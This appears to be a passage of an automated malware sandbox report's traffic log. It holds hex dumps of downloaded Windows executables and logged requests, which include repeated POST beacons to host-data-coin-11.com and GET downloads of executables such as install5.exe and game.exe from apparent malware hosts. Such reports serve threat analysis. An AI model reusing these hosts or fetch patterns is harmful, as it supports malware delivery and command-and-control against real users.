00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 
0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 11 Jan 2022 19:44:58 GMTContent-Type: application/x-msdos-programContent-Length: 334288Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "519d0-57aa1f0b0df80"Expires: Wed, 12 Jan 2022 19:44:58 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 00 f0 03 00 00 00 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 16 00 00 00 50 05 00 00 18 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 11 Jan 2022 19:44:59 GMTContent-Type: application/x-msdos-programContent-Length: 137168Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "217d0-57aa1f0b0df80"Expires: Wed, 12 Jan 2022 19:44:59 GMTCache-Control: max-age=86400X-Cache-Status: HITX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d c2 55 b1 c9 a3 3b e2 c9 a3 3b e2 c9 a3 3b e2 c0 db a8 e2 d9 a3 3b e2 57 03 fc e2 cb a3 3b e2 10 c1 38 e3 c7 a3 3b e2 10 c1 3f e3 c2 a3 3b e2 10 c1 3a e3 cd a3 3b e2 10 c1 3e e3 db a3 3b e2 eb c3 3a e3 c0 a3 3b e2 c9 a3 3a e2 77 a3 3b e2 02 c0 3f e3 c8 a3 3b e2 02 c0 3e e3 dd a3 3b e2 02 c0 3b e3 c8 a3 3b e2 02 c0 c4 e2 c8 a3 3b e2 02 c0 39 e3 c8 a3 3b e2 52 69 63 68 c9 a3 3b e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c4 5f eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 7a 01 00 00 86 00 00 00 00 00 00 e0 82 01 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 02 00 00 04 00 00 16 33 02 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 c0 01 00 74 1e 00 00 b4 de 01 00 2c 01 00 00 00 20 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fa 01 00 d0 1d 00 00 00 30 02 00 68 0c 00 00 00 b9 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 b9 01 00 18 00 00 00 68 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 f4 02 00 00 6c be 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 2e 74 65 78 74 00 00 00 ca 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5e 65 00 00 00 90 01 00 00 66 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 0b 00 00 00 00 02 00 00 02 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 38 00 00 00 00 10 02 00 00 02 00 00 00 e6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 20 02 00 00 04 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0c 00 00 00 30 02 00 00 0e 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 11 Jan 2022 19:45:00 GMTContent-Type: application/x-msdos-programContent-Length: 440120Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "6b738-57aa1f0b0df80"Expires: Wed, 12 Jan 2022 19:45:00 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Tue, 11 Jan 2022 19:45:02 GMTContent-Type: application/octet-streamContent-Length: 357376Last-Modified: Tue, 11 Jan 2022 17:13:47 GMTConnection: keep-aliveETag: "61ddbacb-57400"Expires: Tue, 18 Jan 2022 19:45:02 GMTCache-Control: max-age=604800Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 fd 75 73 5a 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 02 32 00 12 01 00 00 5e 04 00 00 00 00 00 00 10 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 b0 05 00 00 04 00 00 00 00 00 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 71 01 00 c8 00 00 00 00 90 01 00 50 16 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 74 01 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 63 6f 64 65 00 00 00 7e 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 65 78 74 00 00 00 42 d6 00 00 00 50 00 00 00 d8 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a8 33 00 00 00 30 01 00 00 34 00 00 00 16 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c 17 00 00 00 70 01 00 00 12 00 00 00 4a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 
63 00 00 00 50 16 04 00 00 90 01 00 00 18 04 00 00 5c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx Date: Tue, 11 Jan 2022 19:45:02 GMT Content-Type: application/x-msdos-program Content-Length: 1246160 Connection: keep-alive Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT ETag: "1303d0-57aa1f0b0df80" Expires: Wed, 12 Jan 2022 19:45:02 GMT Cache-Control: max-age=86400 X-Cache-Status: EXPIRED X-Cache-Status: HIT Accept-Ranges: bytes Data Raw: [hex dump omitted; the payload is an MZ/PE executable]
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: openresty Date: Tue, 11 Jan 2022 19:45:16 GMT Content-Type: application/octet-stream Content-Length: 287744 Last-Modified: Tue, 11 Jan 2022 17:06:17 GMT Connection: keep-alive ETag: "61ddb909-46400" Expires: Tue, 18 Jan 2022 19:45:16 GMT Cache-Control: max-age=604800 Accept-Ranges: bytes Data Raw: [hex dump omitted; the payload is an MZ/PE executable]
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: openresty Date: Tue, 11 Jan 2022 19:45:21 GMT Content-Type: application/octet-stream Content-Length: 535232 Last-Modified: Tue, 11 Jan 2022 17:06:31 GMT Connection: keep-alive ETag: "61ddb917-82ac0" Expires: Tue, 18 Jan 2022 19:45:21 GMT Cache-Control: max-age=604800 Accept-Ranges: bytes Data Raw: [hex dump omitted; the payload is an MZ/PE executable]
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: openresty Date: Tue, 11 Jan 2022 19:45:34 GMT Content-Type: application/octet-stream Content-Length: 2416280 Last-Modified: Tue, 11 Jan 2022 17:06:42 GMT Connection: keep-alive ETag: "61ddb922-24de98" Expires: Tue, 18 Jan 2022 19:45:34 GMT Cache-Control: max-age=604800 Accept-Ranges: bytes Data Raw: [hex dump omitted; the payload is an MZ/PE executable]
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pggcfgsws.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 207Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gmfjy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 204Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vvrpud.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 118Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://plegf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 192Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yntwh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 293Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jdeywcw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 323Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yxsry.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 124Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ewylxqujhk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 119Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /files/9030_1641816409_7037.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://suliahofuf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 349Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hadtpjchr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 356Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://horjbqmq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 277Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://esvymsmvx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 178Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vqxvg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 303Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://unjcuxt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 328Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xuffstxn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 312Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rnopvq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 244Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lwdprkm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 263Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bnqqs.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 197Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://imncgs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 292Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ipbucsran.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 317Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bvfkxysv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 322Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /6.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.7.214.171:8080
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tomtpsvfw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 285Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gwajgepq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 230Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hqfldvwwlo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 161Host: host-data-coin-11.com
